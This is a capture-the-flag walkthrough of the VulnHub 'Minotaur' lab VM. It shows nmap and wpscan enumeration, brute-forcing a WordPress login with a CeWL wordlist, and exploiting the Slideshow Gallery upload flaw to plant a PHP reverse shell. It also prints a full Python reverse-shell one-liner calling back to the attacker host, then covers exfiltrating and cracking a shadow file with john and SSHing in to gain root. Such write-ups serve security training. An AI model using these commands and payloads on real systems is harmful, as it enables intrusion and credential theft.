Minotaur

Available from VulnHub

This boot2root CTF from SecTalks was described as having some password cracking challenges, among other things. I had a good time with this one, so here we go!

Initial scan:

root@notKali:~# nmap -sT -sV -v -A 192.168.56.223

Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-04-15 22:26 EDT
NSE: Loaded 138 scripts for scanning.
----SNIP----
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 08:00:27:75:F8:9D (Oracle VirtualBox virtual NIC)

Enumeration

I dug into the FTP server on 2020 for a little bit, but didn’t find anything useful. So I turned to a Dirb scan against the web server:

jason@notKali:~$ dirb http://192.168.56.223 /opt/SecLists/Discovery/Web_Content/raft-medium-words.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr 17 20:49:25 2016
URL_BASE: http://192.168.56.223/
WORDLIST_FILES: /opt/SecLists/Discovery/Web_Content/raft-medium-words.txt

-----------------

GENERATED WORDS: 63087                                                         

---- Scanning URL: http://192.168.56.223/ ----
+ http://192.168.56.223/.php (CODE:403|SIZE:285)                                                                                                                     
+ http://192.168.56.223/. (CODE:200|SIZE:11510)                                                                                                                      
+ http://192.168.56.223/.php3 (CODE:403|SIZE:286)                                                                                                                    
+ http://192.168.56.223/.phtml (CODE:403|SIZE:287)                                                                                                                   
+ http://192.168.56.223/.php5 (CODE:403|SIZE:286)                                                                                                                    
+ http://192.168.56.223/.php4 (CODE:403|SIZE:286)                                                                                                                    
+ http://192.168.56.223/server-status (CODE:403|SIZE:294)                                                                                                            
+ http://192.168.56.223/.phps (CODE:403|SIZE:286)                                                                                                                    
==> DIRECTORY: http://192.168.56.223/bull/                                                                                                                           
                                                                                                                                                                     
---- Entering directory: http://192.168.56.223/bull/ ----
+ http://192.168.56.223/bull/.php (CODE:403|SIZE:290)                                                                                                                
==> DIRECTORY: http://192.168.56.223/bull/wp-admin/                                                                                                                  
==> DIRECTORY: http://192.168.56.223/bull/wp-includes/                                                                                                               
==> DIRECTORY: http://192.168.56.223/bull/wp-content/                                                                                                                
+ http://192.168.56.223/bull/. (CODE:200|SIZE:16057)                                                                                                                 
+ http://192.168.56.223/bull/.php3 (CODE:403|SIZE:291)                                                                                                               
+ http://192.168.56.223/bull/.phtml (CODE:403|SIZE:292)                                                                                                              
+ http://192.168.56.223/bull/.php5 (CODE:403|SIZE:291)                                                                                                               
+ http://192.168.56.223/bull/.php4 (CODE:403|SIZE:291)                                                                                                               
+ http://192.168.56.223/bull/.phps (CODE:403|SIZE:291)                                                                                                               

----SNIP----

DOWNLOADED: 567783 - FOUND: 64

This seems to be a wordpress installation - I’ll try wpscan.

jason@notKali:/opt/wpscan$ ./wpscan.rb --url 192.168.56.223/bull
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Sun Apr 17 21:14:42 2016

[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/

[+] WordPress version 4.2.2 identified from advanced fingerprinting
[!] 12 vulnerabilities identified from the version number

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
    Reference: https://twitter.com/klikkioy/status/624264122570526720
    Reference: https://klikki.fi/adv/wordpress3.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection 
    Reference: https://wpvulndb.com/vulnerabilities/8126
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
    Reference: https://core.trac.wordpress.org/changeset/33536
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
    Reference: https://core.trac.wordpress.org/changeset/33529
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
    Reference: https://core.trac.wordpress.org/changeset/33541
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
    Reference: https://core.trac.wordpress.org/changeset/33549
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36435
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36444
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7

[+] WordPress theme in use: twentyfourteen - v1.4

[+] Name: twentyfourteen - v1.4
 |  Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.7
 |  Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI: https://wordpress.org/themes/twentyfourteen/
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: slideshow-gallery - v1.4.6
 |  Location: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
 |  Readme: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/readme.txt
[!] The version is out of date, the latest version is 1.6.3
[!] Directory listing is enabled: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
    Reference: https://wpvulndb.com/vulnerabilities/7532
    Reference: http://seclists.org/bugtraq/2014/Sep/1
    Reference: http://packetstormsecurity.com/files/131526/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
    Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
    Reference: https://www.exploit-db.com/exploits/34681/
    Reference: https://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7

[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
    Reference: https://wpvulndb.com/vulnerabilities/8263
    Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
    Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4

[+] Finished: Sun Apr 17 21:14:48 2016
[+] Requests Done: 45
[+] Memory used: 52.285 MB
[+] Elapsed time: 00:00:05

Some XSS… The arbitrary file upload looks promising. It requires authentication, so I’ll enumerate the blog’s users with wpscan:

jason@notKali:/opt/wpscan$ ./wpscan.rb --url 192.168.56.223/bull --enumerate u
---SNIP---
[+] Enumerating usernames ...
[+] Identified the following 1 users:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | bully | bully |
    +----+-------+-------+

I tried several password lists from Seclist, but came up empty. So I decided to generate a list with CeWL from the Wordpress installation itself.

jason@notKali:~/Dev/cewl$ ./cewl.rb -m 6 -w /home/jason/passwords.txt http://192.168.56.223/bull
CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)

I’ll pass this through john the ripper’s rules:

jason@notKali:~/Dev/jtr/john-1.8.0-jumbo-1/run$ ./john --wordlist=/home/jason/passwords.txt --stdout --rules > /home/jason/password-rules.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
14200p 0:00:00:00 100.00% (2016-04-18 09:20) 157777p/s Feeding

And then pass that back to WPScan for brute forcing:

jason@notKali:/opt/wpscan$ ./wpscan.rb --url 192.168.56.223/bull --wordlist /home/jason/password-rules.txt --username bully
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Mon Apr 18 09:20:36 2016
---SNIP---
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : bully Password : Bighornedbulls                                                                                                               

  Brute Forcing 'bully' Time: 00:06:19 <===============================================================================        > (12944 / 14201) 91.14%  ETA: 00:00:37
  +----+-------+------+----------------+
  | Id | Login | Name | Password       |
  +----+-------+------+----------------+
  |    | bully |      | Bighornedbulls |
  +----+-------+------+----------------+

[+] Finished: Mon Apr 18 09:27:00 2016
[+] Requests Done: 12995
[+] Memory used: 88.52 MB
[+] Elapsed time: 00:06:23

The Dirty!

Now that I can log in as a user, I’ll take a look at the vulnerability from earlier: Slideshow Gallery. I uploaded my favorite php reverse shell, configured it, and set up a listener.

jason@notKali:~/tmp$ python wp_gallery.py -t http://192.168.56.223/bull -f ./php-reverse-shell-1.0/php-reverse-shell.php -u bully -p Bighornedbulls
---SNIP---
[+] Username & password ACCEPTED!

[!] Shell Uploaded!
[+] Check url: http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/./php-reverse-shell-1.0/php-reverse-shell.php (lowercase!!!!)

jason@notKali:~/tmp$ nc -lnvp 10400
Listening on [0.0.0.0] (family 0, port 10400)
Connection from [192.168.56.223] port 10400 [tcp/*] accepted (family 2, sport 54112)
Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 21:21:44 up 2 days,  9:08,  0 users,  load average: 0.00, 0.01, 0.05
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ python -c "import pty; pty.spawn('/bin/bash')"
 www-data@minotaur:/$

I initially had some issue with text input being repeated when calling a bash shell from python, so I sent a second reverse python shell back to me:

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.22",10401));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
_________

jason@notKali:~/tmp$ nc -lnvp 10401
Listening on [0.0.0.0] (family 0, port 10401)
Connection from [192.168.56.223] port 10401 [tcp/*] accepted (family 2, sport 50334)
/bin/sh: 0: can't access tty; job control turned off
$ ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ python -c 'import pty;pty.spawn("/bin/bash")'

I did some digging around and found MySQL credentials in wp_config.php. However, these didn’t really get me anywhere.

/** MySQL database username */
define('DB_USER', 'bully');

/** MySQL database password */
define('DB_PASSWORD', 'Might3*as#FG(');

Browsed to /tmp and found another flag:

www-data@minotaur:/tmp$ cat flag.txt
cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
www-data@minotaur:/tmp$ cp shadow.bak /var/www/html/shadow.bak
cp shadow.bak /var/www/html/shadow.bak

I grabbed shadow.bak using wget, and fired up john to crack it.

jason@notKali:~/Dev/jtr/john-1.8.0-jumbo-1/run$ ./john /home/jason/tmp/shadow.bak 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (heffer)
obiwan6          (minotaur)
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

I tried heffer’s credentials first:

jason@notKali:~/tmp$ ssh heffer@192.168.56.223
heffer@192.168.56.223's password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 19 22:23:25 AEST 2016

  System load:  0.0               Processes:           99
  Usage of /:   8.7% of 18.81GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0: 192.168.56.223
  Swap usage:   1%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Tue Apr 19 22:19:44 2016 from 192.168.56.22
heffer@minotaur:~$ ls
flag.txt
heffer@minotaur:~$ cat flag.txt 
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0

So let’s try minotaur:

jason@notKali:~$ ssh minotaur@192.168.56.223
minotaur@192.168.56.223's password: 
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 19 22:19:43 AEST 2016

  System load:  0.08              Processes:           97
  Usage of /:   8.7% of 18.81GB   Users logged in:     0
  Memory usage: 24%               IP address for eth0: 192.168.56.223
  Swap usage:   1%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May 27 16:55:30 2015
minotaur@minotaur:~$ ls
flag.txt  peda
minotaur@minotaur:~$ cat flag.txt 
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?
minotaur@minotaur:~$ sudo -l
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
minotaur@minotaur:~$ sudo -i
[sudo] password for minotaur: 
root@minotaur:~# ls
flag.txt  peda  quotes.txt
root@minotaur:~# cat quotes.txt 
And for me the only way to live life is to grab the bull but the horns and call up recording studios and set dates to go in recording studios. To try and accomplish somthing.
If you can't dazzle them with brilliance, baffle them with bull.
I admire bull riders for their passion and the uniqueness each one of them has.
I am a huge bull on this country. We will not have a double-dip recession at all. I see our businesses coming back almost across the board.
Not only the bull attacks his enemies with curved horn, but also the sheep, when harmed fights fights back.
Sometimes I'm kind of spacey. I'm like Ferdinand the bull, sniffing the daisey, not aware of time, of what's going on in the world.
There comes a time in the affairs of man when he must take the bull by the tail and face the situation.
Bulls do not win full fights. People do.
root@minotaur:~# cat flag.txt 
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35
root@minotaur:~# whoami
root

Thanks for the fun challenge!